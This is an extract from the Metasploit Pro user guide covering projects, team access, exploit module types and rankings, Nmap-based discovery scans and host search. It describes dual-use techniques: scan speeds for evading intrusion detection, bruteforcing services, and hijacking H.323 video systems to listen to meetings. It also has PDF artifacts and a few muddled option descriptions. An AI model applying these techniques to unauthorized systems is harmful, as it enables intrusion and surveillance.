Name - Provides a unique identifier for the project. Description - Describes the purpose and scope of the project. Network range - Defines the default network range for the project. When you create a project, Metasploit Pro automatically populates the default target range with the network range that you define for the project. Metasploit Pro does not force the project to use the network range unless you enable the network range restriction option. Network range restriction - An option that restricts a project to a specific network range. Enable this option if you want to ensure that the test does not target devices outside the scope of the engagement. If you enable this option, Metasploit Pro will not run tasks against a target whose address does not fall within the network range.
About Projects
97
Project Management
Each project has a name, description, network range, and user access list. As a project owner or an administrator, you can edit the project settings, choose the users who can access the project, and manage the data that the project contains.
Creating a Project
A project is the workspace that you use to build a penetration test. Each project logically groups together the hosts that you want to exploit and the type of information that you want to obtain. Every project has a name, description, and network range. After you create a project, you need to run a discovery scan or an import to bring host data into the project. 1. From the Projects page, click the New Project button.
2. When the New Project page appears, find the Project Settings area, and enter the following information:
Project Management
98
Project name - This is a unique identifier that helps you differentiate between projects. Description - This is a summary of the purpose and scope of the project. Network range - This is the default network range that project uses. The network range sets the default address range that automatically populates the Target Addresses field in discovery scans and Nexpose scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
3. Select Restrict to network range if you want to enforce network boundaries on the project. 4. From the User Access area, select the following information:
Project owner - This is the person who owns the projects. Project members - These are the users who can access, edit, and run the test.
5. Create the project.
Viewing All Projects

To view a list of all projects, select Project > Show All Projects from the main menu.
Viewing All Projects
99
Importing Data from Other Projects

1. From within a project, click the Overview tab. 2. Click the Import button.
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
4. When the File Upload window appears, browse to the location of the Metasploit ZIPfile.
5. If you do not want to import the information for a specific host, you can enter the IPaddress for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address.
Importing Data from Other Projects
100
6. If you do not want the import to overwrite data for an existing host, you must select the Donot change existing hosts option. 7. Click the Import Data button.
Deleting a Project
When you delete a project, you remove all the data that the project contains, including reports, host data, evidence, vulnerability data, and host tags. After you delete a project, you cannot view or access the project again. If you want to delete the project, but save the project data, you can export the project data. When you export the project data, the system provides you with an XML or ZIP file of the project contents. You can import the XML or ZIP file to bring the project data back into Metasploit Pro. 1. Select Project > Show All Projects from the Main menu.
2. When the Projects page appears, select the projects that you want to delete.
3. ClickDelete.
Deleting a Project
101
Changing the Project Owner

By default, the project owner is the person who initially sets up the project. You can change the project owner to transfer ownership and to assign projects to team members. The project owner provides a way for you and your team members to easily identify the projects that each of you own. For example, if you want to see the projects that you have been assigned, you can sort the project list by owner. All of your projects will be grouped together. 1. From the Main menu, select Project > Show All Projects.
2. When the Projects page appears, select the project that you want to assign an owner. 3. Click the Settings button.
4. When the Project Settings page appears, find the User Access area. 5. Click the Project owner dropdown and select the person you want to assign the project to.
Changing the Project Owner
102
6. Click the Update Project button.
Managing User Access

As the project owner, you may want to restrict the team members who can view and edit your project. For example if you have data that you do not want anyone to overwrite, you can disable the access rights for other team members. Note: Team members that have administrative rights can view and modify all projects, regardless of the user access settings 1. From the Main menu, select Project > Show All Projects.
2. When the Projects page appears, select the project that you want to edit. 3. Click the Settings button.
Managing User Access
103
4. When the ProjectSettings page appears, find the User Access area. 5. Select project members to enable them to view and modify the project or deselect project members to prevent them from modifying the project.
6. Click the UpdateProject button.
Setting the Network Range

When you create a project, you can define an optional network range that sets the scope of the project. The network range defines the addresses that Metasploit Pro uses to automatically populate the target addresses for discovery scans and Nexpose scans. It also defines network boundaries that Metasploit Pro can enforce for the project. You do not need to set the network range unless you want to enforce network boundaries. If you choose to enforce network boundaries on a project, Metasploit Pro uses the network range that you define for the project. 1. From within a project, select Project>Show AllProjects from the Main menu.
2. Select the project that you want to set the network range for.
104
3. Click the Settings button.
4. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hypens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example 192.168.1.* indicates 192.168.1.1-255.
105
Restricting a Project to a Network Range

You can restrict the network range to enforce network boundaries on a project. When you restrict a project to a network range, you cannot run any tasks unless the target addresses fall within network range that you define. For example, if you have a client who wants you to test a specific network range, you can set the network range and restrict the project to it to ensure that you do not accidentally target any devices that are outside of that range. 1. Select Project > Show All Projects from the Main menu.
2. Select a project and click the Settings button.
106
3. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example 192.168.184.* indicates 192.168.184.1-255.
4. Select the Restrict to Network Range option.
107
108
Team Collaboration
The multi-user support provides you with the ability to collaborate on an engagement or penetration test with other team members. You and your team can log into the same instance of Metasploit Pro to perform tasks, review data, and share projects. You can access Metasploit Pro through the Metasploit Web UI, which can run on the local machine or across the network. Some features that you can implement to enhance team collaboration are network boundaries, host tags, and host comments. These features help you create separate workloads for each team member and organize an engagement into logical containers. For example, you may want to assign certain hosts to a specific team member to test.
User Access Management

Each project has a list of users who can access the project. Any person who has access to the project can edit, view, and run tasks from the project. You can manage the user access to control who you want to have access to the information stored within the project.
Adding Users to a Project

You can give team members access to a project so that they can view, edit, and run tasks from the project. 1. From the Main menu, select Project > Show All Projects.
2. Select the project that you want to add users to.
Team Collaboration
109
3. Find the User Access settings. The User Access list displays all Metasploit Pro users. 4. Click the Settings button. 5. Select the users that you want to have access to the project.
Removing Users from a Project

You can remove members from a project to restrict their ability to view, change, or run tasks from the project. When you remove a user from a project, you disable their access to the project. 1. From within a project, select Project >Project Settings.
110
2. Find the User Access settings. The user access list displays all available Metasploit Pro users. 3. Deselect the users that you do not want to have access to the project.
Assigning the Project to a User

The project owner is the person who sets up the project and assumes responsibility for the data and penetration test. You can use the project owner role to delegate projects or workloads to members on your team. 1. From the Main Menu, select Project >Show All Projects.
2. Select the project that you want to assign to a user.
111
3. Click the Settings button. 4. Find the User Access settings. The User Access list displays all available Metasploit Pro users. 5. From the Project Owner dropdown menu, choose an owner for the project.
Host Comments
You can add a host comment to share information about a host. For example, if you identify a vulnerability on a host, and you want to share that information with other project users, you can add a host comment to that host. When you view the host details, you can see comments that other users have added to the host.
Adding Host Comments

1. From within a project, select Analysis > Hosts.
Host Comments
112
2. Click on the name of the host to which you want to add a comment. 3. When the Host Details page appears, click the Update Comment button.
4. Enter the information you want to add to the host in the Comments field. For example, if you know that a host is not exploitable, you can add the information as a comment. When other team members see the note, they know that they should not attempt to exploit the host. 5. Click the Save Comments button.
Updating Host Comments

1. From within a project, select Analysis > Hosts.
2. Click on the name of the host to which you want to add a comment.
Host Comments
113
3. When the Host Details page appears, click the Update Comment button.
4. Edit the information in the Comments field.
Host Comments
114
5. Click the Save Comments button.
Host Comments
115
Chapter 6:
Modules
To learn more about modules, read the following topics:

l
About Modules on page 117 Module Search on page 121 Module Statistics on page 123 Modules Types on page 117 Module Rankings on page 124
About Modules
Modules are the underlying core components of the Metasploit Framework. They provide the components and capabilities that Metasploit Pro needs to perform an attack or a execute a task, such as exploiting a target or fingerprinting a host. Every task that Metasploit Pro performs is defined within a module. When you configure tasks and run them from the user interface, Metasploit Pro does a lot of work behind the scenes to select the appropriate modules that it needs to run. For example, the bruteforce attack runs a combination of service specific modules that focus on the services that are running on the target hosts. Metasploit Pro builds an attack plan based on the services that have been identified by the discovery scan or import. If you want to learn more about a particular module, you can use the built-in module search engine or you can visit the Metasploit Exploit Database.
Modules Directory
Your local version of Metasploit Pro has a copy of the Metasploit Framework, which contains most of the modules that the exploit database contains. If you want to review the modules that are available on your local machine, you can browse to $INSTALL/metasploit/msf3/modules. The modules are categorized by type first and by protocol next. For example, you can find FTP fuzzers in the following location: $INSTALL/metasploit/msf3/modules/auxiliary/fuzzers/ftp.
Modules Types
The Metasploit Framework categorizes modules based on the type of action that the module performs. The majority of modules are either an exploit or an auxiliary module. Generally, if a module can obtain a shell on a remote machine, it is an exploit module. Otherwise, it is an auxiliary module.
Exploit Modules
An exploit module executes a sequence of commands to target a specific vulnerability found in a system or application. An exploit module takes advantage of a vulnerability to provide control of the target system. Generally, you use exploit modules to run remote code execution on a target machine and to target remote services and client-side applications. Some examples of exploits include buffer overflow, code injection, and web application exploits.
About Modules
117
An exploit can be a client-side or server-side exploit. A client-side exploit typically occurs through the use of social engineering techniques. Server-side exploits, on the other hand, take advantage of active services on an exposed server.
Auxiliary Modules
Most modules that are not an exploit can be considered an auxiliary module. An auxiliary module is any module that does not execute a payload. Instead, it performs arbitrary actions that may not be directly related to exploitation and provides supplementary support for tasks that you need to perform penetration test. Examples of auxiliary modules include vulnerability scanners, port scanners, fuzzers, and denial of service attacks.
Payload Modules
A payload is the shell code that runs after an exploit successfully compromises a system. The payload enables you to define how you want to connect to the shell and what you want to do to the target system after you take control of it. A payload can open a Meterpreter or command shell. Meterpreter is an advanced payload that allows you to write DLL files to dynamically create new features as you need them. For more information on Meterpreter, see the Meterpreter User Guide.
NOP Modules
A NOP generator produces a series of random bytes that you can use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad buffers.
Post-Exploitation Modules
A post-exploitation module enables you to gather more information or to gain further access to an exploited target system. Examples of post-exploitation modules include hash dumps and application and service enumerators.
Modules Excluded from Metasploit Pro

Most modules that are available in the framework are available in Metasploit Pro. However, some modules may be excluded if their dependencies are not bundled with the framework. The modules that are excluded depend on the following libraries:
l
Oracle - Affects modules that target Oracle. Lorcon2 - Affects modules that target wireless systems.
Modules Excluded from Metasploit Pro
118
Libpcap - Affects modules that target sniffers. DECT - Affects modules that target telephony.
Common Module Options

The following options are available when you configure a module:
l
Target Addresses - The hosts targeted by the exploit. Leave this field blank to include all hosts in the project. Excluded Addresses - The hosts excluded from the attack. Leave this field blank to include all hosts in the project. Exploit Timeout - The number of minutes the module has before it times out. Payload Type - The type of shell that the exploit obtains. Connection Type - The direction of the connection. Listener Ports - The address for the machine that the listener listens on. Listener Host - The port for the machine that the listener listens on. RPORT - The target port. RHOST - The target address. VHOST - The address for the HTTP virtual server. LHOST - The address for the local host. LPORT- The listener port on the local host.
Running a Module
1. From within a project, select Modules > Search. 2. Use the search engine to find a module. You can utilize the keywords to either narrow down your search or to find a specific module. For example, if you want to search for Windows exploits, you can search for platform:windows, or if you want to search specifically for the ms08-067 exploit, you can search for path:ms08_067_netapi.
Common Module Options
119
3. After you find the module that you want to use, click on the module name to open the configuration page.
4. At a minimum, you should define the IPaddresses of the target systems that you want to include or exclude from the exploit. If you do not specify any target addresses, Metasploit Pro includes all hosts that are in the project.
5. Optionally, you can define any advanced options and evasion options that are available. Note: The options that are available vary between different modules. By default, each module is preconfigured with default settings that are appropriate for you to run against a target. The payloads will be preselected based on the intended target. For example, Metasploit Pro will use Meterpreter for Windows targets and the command shell for Linux/UNIX targets. 6. After you configure the options for the module, click the Run Module button to launch the module.
Running a Module
120
Module Search
The module search engine searches the module database for the search term and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target. You can utilize keyword tags to perform a targeted search. This reduces the number of results that the system returns.
Keyword Tags
You can use keyword tags to define a keyword expression. A keyword tag is a keyword that helps you efficiently search for a module. If you want to search for a module that has a specific author, you can use the CVE tag to search for modules written by them. For example, if you know the CVE ID of the exploit you want to use is 2008-4250, you can search for CVE:2008-4250. This search returns an exploit for the ms08-067 vulnerability. The following table lists the keyword tags:
l
app - Searches for modules that are either a client or server attack. Example: app:client
author - Searches for modules by author. Example: author:hdm
bid - Searches for modules by Bugtraq ID. Example: bid:10078
cve - Searches for modules by CVE ID. Example: cve:2009
name - Searches for the keyword expression within the module descriptive name. Example: name:Java
osvdb - Searches for modules by OSVDB ID. Example: osvdb:875
platform - Searches for the modules that affect the platform or target that you define in the keyword expression. Example: platform:linux
Module Search
121
path - Searches for the keyword expression within module path name. Example: path:windows/smb
type - Searches for the modules that belong to the module type that you define in the keyword expression. For example, use exploit, auxiliary, or post. Example: type:exploit
Keyword Tags
122
Module Statistics
Module statistics show the total number of modules that are available and show the number of modules that are available for each type of module. Module types include exploit modules, auxiliary modules, server-side exploits, and client-side exploits.
Viewing Module Statistics

1. From within a project, select Modules > Search. 2. Click the Show link located next to the Module Statistics. A list of module types and their statistics will display. You can see the total number of modules that are available in the Metasploit Framework, as well as a numerical breakdown of each module type, such as exploit modules, auxiliary modules, and post-exploitation modules.
Module Statistics
123
Module Rankings
Module rankings provide details about the reliability and impact of an exploit on a target system. Every module in the Metasploit Framework has a ranking, which is based on how likely the exploit will disrupt the service. There are six possible rankings. The higher rankings indicate that the exploit is less likely to cause instability or crash the target system. Use the following rankings to determine the reliability of a module:
l
Low - The exploit is unstable and unlikely to be successful. Do not use exploits with a low ranking. Average - The exploit can be unstable and unreliable. Do not use exploits with a normal ranking. Normal - The exploit is generally reliable, but cannot auto-detect the default target Good - The exploit has a default target. Great - The exploit has a default target and can automatically detect the correct target. Excellent - The exploit never crashes the service. Examples of exploits that have an excellent ranking are SQL injections and CMD executions.
Module Rankings
124
Chapter 7:
Scanning
To learn more about scanning, read the following topics:

l
About Scanning on page 126 Discovery Scans on page 127 Discovery Scan Tasks on page 135
About Scanning
Before you can begin the exploitation phase of a penetration test, you must add host data to the project. Host data refers to the IP addresses of the systems that you want to exploit and the active ports, services, and vulnerability information associated with those systems. To add host data to a project, you can either run a discovery scan or you can import scan data from a vulnerability scanner, such as Nexpose or Nessus. If you import data from vulnerability analysis tool, or some other third party vendor, you should still run a discovery scan to identify new or additional information for those hosts. A discovery scan is the port scanner included with Metasploit Pro. It combines Nmap with several modules to identify the systems that are alive and to uncover the open ports and services. A port is a data connection that serves as a gateway for communication and enables traffic to travel between systems. Network services, like SSH, telnet, and HTTP, typically run on standard port numbers and can indicate the purpose of the system. You can use the results to filter the list of attackable targets. For example, if you discover a service that allows remote code execution, like VNC, you can bruteforce the service to attempt to log into the system.
About Scanning
126
Discovery Scans
One of the first steps in penetration testing is reconnaissance. Reconnaissance is the process of gathering information to obtain a better understanding of a network. It enables you to create list of target IP addresses and devise a plan of attack. Once you have a list of IP addresses, you can run a discovery scan to learn more about those hosts. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. A discovery scan is the internal Metasploit scanner. It uses Nmap to perform basic TCP port scanning and runs additional scanner modules to gather more information about the target hosts. By default, the discovery scan includes a UDP scan, which sends UDP probes to the most commonly known UDP ports, such as NETBIOS, DHCP, DNS, and SNMP. The discovery scan tests approximately 250 ports that are typically exposed for external services and are more commonly tested during a penetration test. During a discovery scan, Metasploit Pro automatically adds the host data to the project. You can review the host data to obtain a better understanding of the topology of the network and to determine the best way to exploit each target. Oftentimes, the network topology provides insight into the types of applications and devices the target has in place. The more information that you can gather about a target, the more it will help you fine-tune a test for it.
Data Gathered during a Discovery Scan

A discovery scan gathers the following information from a host:
l
The host status The operating system The open ports The running services
How a Discovery Scan Works

A discovery scan can be divided into four distinct phases: ping scan, port scan, OS and version detection, and data import. The first phase of a discovery scan, ping scanning, determines if the hosts are online. The discovery scan sets the -PI option, which tells Nmap to perform a standard ICMP ping sweep. A single ICMP echo request is sent to the target. If there is an ICMP echo reply, the host is considered up or online. If a host is online, the discovery scan includes the host in the port scan.
Discovery Scans
127
During the second phase, port scanning, Metasploit Pro runs Nmap to identify the ports that are open and the services are available on those ports. Nmap sends probes to various ports and classifies the responses to determine the current state of the port. The scan covers a wide variety of commonly exposed ports, such as HTTP, telnet, SSH, and FTP. The discovery scan uses the default Nmap settings, but you can add custom Nmap options to customize the Nmap scan. For example, the discovery scan runs a TCP SYN scan by default. If you want to run a TCP Connect Scan instead of a TCP SYN Scan, you can supply the -sT option. Any options that you specify override the default Nmap settings that the discovery scan uses. After the discovery scan identifies the open ports, the third phase begins. Nmap sends a variety of probes to the open ports and detects the service version numbers and operating system based on how the system responds to the probes. The operating system and version numbers provide valuable information about the system and help you identify a possible vulnerability and eliminate false positives. Finally, after Nmap collects all the data and creates a report, Metasploit Pro imports the data into the project. Metasploit Pro uses the service information to send additional modules that target the discovered services and to probe the target for more data. For example, if the discovery scan sweeps a target with telnet probes, the target system may return a login prompt. A login prompt can indicate that the service allows remote access to the system, so at this point, you may want to run a bruteforce attack to crack the credentials.
Ports Included in the Discovery Scan

By default, the discovery scan includes the following set of ports:
l
Standard and well known ports, such as ports 20, 21, 22, 23, 25 53, 80, and 443. Alternative ports for a service, such as ports 8080 and 8442, which are additional ports that HTTP and web services can use. Ports listed as the default port in a module.
In total, the discovery scan includes over 250 ports. If you do not see the port that you want to scan, you can manually add the port to the discovery scan. For example, if you know that your company runs web servers with port 9998 open, you need to manually add port 9998 to the discovery scan. This ensures that the discovery scan includes every port that is potentially open. If you want to scan all ports, you can specify 1-65535 as the port range. Keep in mind that a discovery scan that includes all ports can take several hours to complete. If there is a port that you do not want to scan, you can exclude the port from the discovery scan. The discovery scan will not scan any ports on the excluded list. For example, if your company uses an
Ports Included in the Discovery Scan
128
application that runs on port 1234, and you do not want to affect the applications performance, you can add the port to the excluded list.
Supported Scan Data Types

Metasploit Pro supports the import of scan data from vulnerability analysis tools, like Nexpose, other penetration testing tools, like Core Impact, and non-vulnerability analysis products, like PWDump files. If you want to use the scan data in your penetration test, you can import the reports or scan data files into Metasploit Pro. Metasploit Pro supports the following formats:
l
Metasploit PWDump Export Metasploit Export XML Metasploit Export ZIP NeXpose XML or XML 2.0 NeXpose Raw XML or XML Export Foundstone Network Inventory XML Microsoft MBSA SecScan XML nCircle IP360 (XMLv3 and ASPL) NetSparker XML Nessus NBE Nessus XML (v1 and v2) Qualys Asset XML Qualys Scan XML Burp Session XML Acunetix XML AppScan XML Nmap XML Retina XML Amap Log IP Address List Libpcap Network Capture
Supported Scan Data Types
129
Spiceworks Inventory Summary CSV Core Impact XML
Raw XML is only available in commercial editions of Nexpose and includes additional vulnerability information. Note: Metasploit Pro does not import service and port information from Qualys Asset files. If you import a Qualys Asset file, you must run a discovery scan to enumerate services and ports that are active on the imported hosts.
Discovery Scan Options

You can configure the following options for a discovery scan.
Target addresses
Defines the individual hosts or network range that you want to scan.
Perform initialport scan

Performs a port scan before the discovery scan performs service version verification.
Custom Nmap arguments

Sends flags and commands to the Nmap executable. Discovery scan does not support the following Nmap options: -o, -i, -resume, -script, -datadir, and -stylesheet.
Additional TCP ports

Appends additional TCP ports to port scan. By default, the port scan covers a small, but wide range of ports. Use this option if you want to add more ports to the scan.
Excluded TCPports
Excludes certain TCP ports from service discovery. By default, the port scan covers a specific range of ports. Use this option to add a port that you want to exclude from the scan.
Custom TCP port range

Specifies a range of TCP ports for the discovery scan to use instead of the default ports. If you set a custom TCP port range, the discovery scan ignores all default ports and uses the range that you define
130
instead.
Custom TCP source range

Specifies the TCP source port that the discovery scan uses instead of the default port. Use this option to test firewall rules.
Fast detect: Common TCPports only

Performs a scan on the most common TCP ports, which reduces the number of ports that the discovery scan scans.
Portscan speed
Controls the Nmap timing option. Choose from the following timing templates:
l
Insane (5) - Speeds up the scan. Assumes that you are on a fast network and sacrifices accuracy for speed. Scan delay is less than 5 ms. Aggressive (4) - Speeds up the scan. Assumes that you are on a fast and reliable network. Scan delay is less than 10 ms. Normal (3) - The default port scan speed. Does not affect the scan. Polite (2) - Uses less bandwidth and target resources to slow the scan. Sneaky (1) - Use this port scan speed for IDS evasion. Paranoid (0) - Use this port scan speed for IDS evasion.
Portscan timeout
Determines the amount of time Nmap spends on each host. The default value is 5 minutes.
UDPservice discovery
Sets the discovery scan to find all services that are on the network. Metasploit uses custom modules instead of Nmap to perform UDP service discovery.
Scan SNMP community strings

Launches a background task that scans for devices that respond to a variety of community strings.
Scan H.323 video endpoints

Scans for H.323 devices.
131
Enumerate users via finger

Queries user names and attempts to bruteforce the user list if the discovery scan detects the Finger protocol.
Identify unknown services

Sets the discovery scan to find all unknown services and applications on the network.
Single scan: scan hosts individually

Runs a scan on individual hosts. The discovery scan scans the first host entirely and stores the information in the database before it moves onto the next host.
Dry run: only show scan information

If enabled, this option prepares the scan and shows all of the options that the Discovery Scan will use in the task log. However, it does not launch the scan.
Web scan: run the Pro Web Scanner

Automatically runs a web scan, web audit, and web exploit along with a discovery scan. It is generally recommended that you do not enable this option unless you are running a scan against a very small set of hosts. If you are running a discovery scan against a large number of hosts, you should run the web scanner separately from the discovery scan.
SMB user name

Defines the SMB user name that the discovery scan uses to attempt to login to SMB services.
SMBpassword
Defines the SMB password that the discovery scan uses to attempt to login to SMB services.
SMB domain
Defines the SMB server name and share name.
IPv6 Addresses
Metasploit Pro does not automatically detect IPv6 addresses during a discovery scan. For hosts with IPv6 addresses, you must know the individual IP addresses that are in use by the target devices and specify
IPv6 Addresses
132
those addresses to Metasploit Pro. To identify individual IPv6 addresses, you can use SNMP, Nmap, or thc-alive6, which is part of the thc-ipv6 toolkit. After you identify the IPv6 addresses for the target devices, you can either import a text file that contains the host addresses into a project or manually add the hosts to a project. If you choose to import the addresses, the text file that you use must list each IPv6 address on a new line. To import a host address file, select Analysis > Hosts > Import. When the Import Data window appears, browse to the location of the host address file and import the host address file. To manually add a host, select Analysis > Hosts> New Host.
Virtual Host Discovery

During a discovery scan, Metasploit Pro will detect any guest operating systems, or virtual machines, on the target system. Metasploit Pro displays a list of virtual machines on the host page and denotes the virtual machine with a VM icon. For example, a machine that runs VMware ESX displays the VMware icon and the guest operating system and version. Use this information to differentiate between real machines and virtual machines.
Supported Host VM Servers

Metasploit Pro supports the following host VM servers:
l
VMware ESXi 3.5, 4.0, 4.1, and 5.0 VMware ESX 1.5, 2.5, 3.0, and 4.0 vCenter
Supported Guest Operating Systems

Metasploit Pro supports the following guest operating systems:
l
VMware Xen BreakingPoint Virtual PC Virtual Iron QEMU VirtualBox
133
Compromised Virtual Systems

If you gain access to a target system that a runs virtual environment, Metasploit Pro captures screenshots of the guest operating systems on the host system. To view the screenshots of the guest operating systems, go to Analysis > Hosts > Captured Evidence. The Captured Evidence tab displays a list of looted evidence, such as screenshots from virtual machines.
134
Discovery Scan Tasks

You can perform the following tasks with the discovery scan:
l
Running a Discovery Scan Viewing the Results from a Discovery Scan Importing Scan Data
Running a Discovery Scan

A discovery scan runs Nmap along with a few service specific modules to identify the systems that are alive and to find the open ports and services. At a minimum, you need to specify the addresses of the systems that you want to include in the scan. There are advanced options that you can configure as well to fine-tune the different scan phases. For example, you can bypass the port scanning phase and move onto version detection, or you can scan each host individually to accelerate the import of hosts into the project. Additionally, these advanced settings let you choose the ports, the target services, the scan speed, and the scan mode. Since the discovery scan mostly leverages Nmap, you can specify additional Nmap options to customize the scan. For example, if you want to change the scanning technique, you can provide the Nmap command line option for the technique that you want to use, and the discovery scan applies those settings instead of the default ones. For more information on Nmap options, visit the Nmap documentation. 1. From within a project, click the Overview tab. 2. When the Overview page appears, click the Scan button.
3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
Discovery Scan Tasks
135
4. At this point, you can launch the scan. However, if you want to fine-tune the scan, you can click the Show Advanced Options button to display additional options that you can set for the discovery scan. For example, you can specify the IP addresses that you want to explicitly include and exclude from the scan. 5. When you are ready to run the scan, click the Launch Scan button.
Scanning for H.323 Conferencing Systems

You can enable the discovery scan to search for H.323 systems that have auto-answer turned on. If you enable the H.323 scan option, the discovery scan runs the H.323 scanner module, which identifies any video conferencing systems in the target range. Access to a video conferencing system enables you to remotely control the camera to monitor the surrounding areas. For example, after you obtain access to an H.323 system, you can listen to any meetings that take place near the system or use the camera to zoom in on any nearby paperwork. 1. From within a project, click the Overview tab. 2. When the Overview page appears, click the Scan button.
136
4. Click the Show Advanced Options button. 5. In the CustomTCPsource port field, enter 1720.
6. Deselect the UDPservice discovery option.
137
7. Select the Scan H.323 video endpoints option. By default, this option is enabled. 8. Click the Launch Scan button.
Defining Nmap Arguments

The discovery scan runs with the following Nmap options turned on: -sS -T5 -PP -PE -PM -PI PA. If you want to overwrite the default options or add scan options, you can define a list of Nmap command line options. The options that you define take precedence over any internal, default setting. Typically, you add Nmap options to perform custom scanning techniques and modify scan speeds. For example, if you want to perform a ping scan, you may want to specify -sn so that the scan does not run a port scan. Note: The discovery scan supports most Nmap options except for -o, -i, -resume, -datadir, and stylesheet. 1. From within a project, click the Overview tab. 2. When the Overview page appears, click the Scan button.
4. Click the Show Advanced Options button. 5. Under the Advanced Target Settings, find the Custom Nmap arguments field.
Defining Nmap Arguments
138
6. In the Custom Nmap arguments field, enter the Nmap arguments you want to use.
Note: Any command line arguments that you specify takes precedence over the default configuration that Metasploit Pro uses for the discovery scan. 7. Optionally, you can define any advanced options that are available. For example, you can specify the IP addresses that you want to include and exclude from the scan, as well as the target ports, services, scan speed, and scan mode for the discovery scan. 8. When you are ready to run the scan, click the Launch Scan button.
Viewing the Results from a Scan

The Hosts page lists all the hosts that communicated with your machine and the services, notes, vulnerabilities, and evidence associated with each host. The Host page also lists the hosts that you imported or manually added to the project. To view the results of a discovery scan, go to Analysis > Hosts.
Viewing the Results from a Scan
139
Host Management
A host refers to a target machine that you scanned, imported, or manually added to a project. At a minimum, each host has an IP address, a list of active services, and system information. You can manually add a host to a project if you do not have import data for it or if the discovery scan cannot communicate with it. You can configure the details for the host, which includes the network, operating system, and service information. Additional information you can define includes vulnerability information, host comments, and host tags.
Host Management
140
Advanced Search
When you perform a basic search, Metasploit searches all columns in the hosts table. Oftentimes, the search may not be specific enough and returns records that are false positives. For example, if you perform a basic search for Windows, the results may include all hosts that have Windows somewhere in the description, and not hosts that are Windows specific machines. To work around false positives, you can perform an advanced search. In an advanced search, you specify exactly where in the hosts table you want the search to look.This is particularly useful when you want to narrow the results to a specific subset of data.
Parts of a Advanced Search Query

An advanced search query is made up of three parts:
l
Search Filter - Refers to the column in the table where you want the search to look. Search Operator - Refers to the operators that you can add to narrow or broaden a search query. A search operator is also known as a connector. Keyword - Refers to a single word or phrase that the search uses to find matching records.
To create an advanced search query, you need to first specify the search filter, followed by the search operator and keyword. Going back to the previous example, if you want to only see hosts that are Windows specific machines, you would use the following search query: os:windows. This query ensures that the search only looks in the OS column of the hosts tables for the Windows keyword and only returns hosts that have been fingerprinted as Windows systems.
Search Operators
Metasploit Pro provides several different types of search operators that you can use to refine your host search. The search operator that you need to use depends on the type of data that you want the search to find.
Text Operators
You should use text operators when you want to perform a full-text search. Typically, you use text operators when you search for any data other than ports or IP addresses. Search Operator Like Operator (:)
Description Add the LIKEoperator to a search query to include all records that have the keyword in the specified column.
Advanced Search
141
Search Operator
Description For example, if you search for os:windows, the search shows any hosts with the keyword, Windows, in the OS field. Add the NOTLIKE operator to a search query to exclude records that have the keyword in
Not Like Operator (!:)
the specified column. For example, if you search for os!:windows, the search does not return any records that contain the keyword, Windows, in the OSfield. Add the EQUALS operator to a search query to return an exact match.
Equals Operator (=)
For example, if you search for os=Windows, the search shows all hosts that match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will not appear in the results because they do not match the query exactly. Add the NOTEQUALS operator to exclude records that contain the keyword.
Not Equals Operator (<>) For example, if you search for os<>Windows, the search excludes hosts that exactly match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will appear in the results because they do not match the query. Add the AND operator to a query to combine multiple keywords or search criteria. The And Operator (&&) For example, if you search for os:windows && sp0, the search returns the hosts that match both criteria. Add the OR operator to a search query to include any of your search terms in the resulting Or Operator (||) records. You can use the OR operator to broaden your search. For example, if you search for os:Windows || ip:192.168, the search finds hosts that are running Windows or have a IP address that starts with 192.168. The hosts do not have to match both search criteria. AND operator requires that all the keywords or search criteria appear in the results.
Numeric Operators
You should use numeric operators when you search for integer values or when you want to compare numeric values. Typically, you use numeric operators when you search for IP addresses or ports. Search Operator Equal Operator (= or :) For example, if you search for port:445, the search shows all services that Description Add the equal operator to perform a mathematical equivalency check.
142
Search Operator are open on that port.
Description
Add the not equal operator to perform a mathematical non-equivalency Not Equal Operator (<> or !:) check. For example, if you search for port!:445, the search returns all services except those that are open on port 445. Add a comparison operator to compare two values. Comparison Operator (<, <=, > or, >=) For example, if you search for vulns>0, the search only shows hosts that have vulnerabilities.
Tag Operators
You should use tag operators when you search for host tags. Search Operator Hash Sign (#) For example, if you search for #windows, the search shows any hosts that have the windows host tag.
Description Append the hash sign to any host tag to search for hosts.
Search Filters
In Metasploit, a search filter refers to a column of data in the hosts table. You specify a search filter to specify where you want the search to look in the hosts table. For example, if you want to search for hosts based on the operating system, you should use the os search filter. The search filters that are available depend on the page that you are currently viewing in the Analysis area. When you perform a search, you can only use the search filters that are available for that specific page. Some search filters are global, such as hostname and OS; however, there are some that are specific to the page that you are viewing, such as proto or ref. There are five different pages that you can view from the Analysis area and each has its own set of search filters:
l
Hosts Notes Services
143
Vulnerabilities Captured Data
Read the following sections to learn more about the search filters that each page supports.
Hosts Page
The Hosts Page enumerates all hosts that have been fingerprinted. To access the Hosts page, select Analysis >Hosts from the Tasks bar. Search Filter Hostname OS Version Purpose IP Vulns Services Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the operating system that runs on the host. Refers to the version of the operating system that the host runs, such as Windows 2000. Identifies whether the host is a client, server, or device. Refers to the IPaddress of a host. Identifies the number of vulnerabilities that has been identified for a host. Identifies the number of services that has been found for a host.
Notes Page
The Notes page shows any additional information that Metasploit was able to obtain from the hosts. Notes are bits of information that Metasploit is able to obtain from a host, but are not easily sorted into existing table columns.To access the Notes page, select Analysis >Notesfrom the Tasks bar. Search Filter Hostname Type IP Data Description Refers to the host name, or nickname,that uniquely identifies the machine. Identifies the method or source used to obtain the note, such as from an import or fingerprint. Refers to the IPaddress of a host. Refers to the information stored in the note.
Services Page
The Services Page shows all services that Metasploit was able to enumerate for open ports.To access the Services page, select Analysis >Services from the Tasks bar. Search Filter Hostname Description Refers to the host name, or nickname,that uniquely identifies the machine.
144
